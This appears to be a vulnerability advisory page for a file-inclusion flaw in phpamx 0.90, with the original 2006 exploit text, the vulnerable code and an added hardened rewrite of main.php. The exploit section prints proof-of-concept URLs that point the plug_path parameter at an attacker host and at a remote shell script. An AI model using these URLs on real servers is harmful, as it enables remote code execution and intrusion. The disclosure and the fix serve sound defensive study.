Remote|Local File Include Vulnerability
Vendor: phpamx
By: MP
CVSS: 7.5 (HIGH)
CWE: 98
Product Name: phpamx
Affected Version From: 0.90
Affected Version To: 0.90
Patch Exists: NO
Related CWE: N/A
CPE: a:phpamx:phpamx:0.90
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

phpamx 0.90

phpamx 0.90 is vulnerable to remote and local file inclusion. The vulnerability exists because the 'php/plugins/main.php' script does not sufficiently sanitize user-supplied input in the 'plug_path' parameter. An attacker can exploit this to include arbitrary remote files and execute arbitrary code on the vulnerable system. The first variant requires 'register_globals' to be set to 'On'; the second requires 'magic_quotes_gpc' to be set to 'Off'.

Mitigation:

Disable 'register_globals' and 'magic_quotes_gpc' in the php.ini configuration file.

Exploit-DB raw data:

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ phpamx 0.90 ]                                     #
#                                                               #
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published: 2006/10/18                                         #
# Remote:    Yes                                                #
# Local:     No                                                 #
# Type:      High                                               #
# Site:      http://sourceforge.net/projects/phpamx/            #
# Author:    MP                                                 #
# Contact:   mp01010@yahoo.com                                  #
#                                                               #
#################################################################

Vuln Code (php/plugins/main.php):
<?php
include($plug_path."!playtime_top15.php");
include($plug_path."!mapcycle_list.php");
//nothing here
?>

# Vuln 1.0 -> requires register_globals = On
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/


# Vuln 2.0 -> requires magic_quotes_gpc = Off
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/shell.php?cmd=pwd%00

# milw0rm.com [2006-10-18]
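
A hardened form of the vulnerable main.php shown above, as an added example that is not part of the original advisory or of the phpamx project. It assumes the two plugin files sit in the same directory as main.php, and the PHPAMX_ENTRY constant is hypothetical. The fix does not depend on php.ini settings, because the include base is never read from the request.

```php
<?php
// Added example, not phpamx code: php/plugins/main.php with the include base
// fixed on the server, so nothing in the request can steer include().

// Hypothetical guard: assumes the legitimate entry script runs
// define('PHPAMX_ENTRY', true); before including this file.
if (!defined('PHPAMX_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}

// Assumption: the two plugin files sit in the same directory as this script.
// Assigning here overwrites anything register_globals injected from the request.
$pluginDir = realpath(dirname(__FILE__));

// Fixed allowlist: the two files the original script includes.
$pluginFiles = array('!playtime_top15.php', '!mapcycle_list.php');

foreach ($pluginFiles as $file) {
    // realpath() returns false for a missing file, so a URL or a broken
    // path never reaches include.
    $path = realpath($pluginDir . DIRECTORY_SEPARATOR . $file);

    // Containment check: the resolved path must stay inside $pluginDir.
    if ($path === false
        || strpos($path, $pluginDir . DIRECTORY_SEPARATOR) !== 0) {
        trigger_error('phpamx: plugin file not found: ' . $file, E_USER_WARNING);
        continue;
    }
    include $path;
}

// Related php.ini hardening (real directives):
//   register_globals  = Off   ; request variables no longer become globals
//   allow_url_include = Off   ; PHP >= 5.2.0: include() refuses URL wrappers
?>
```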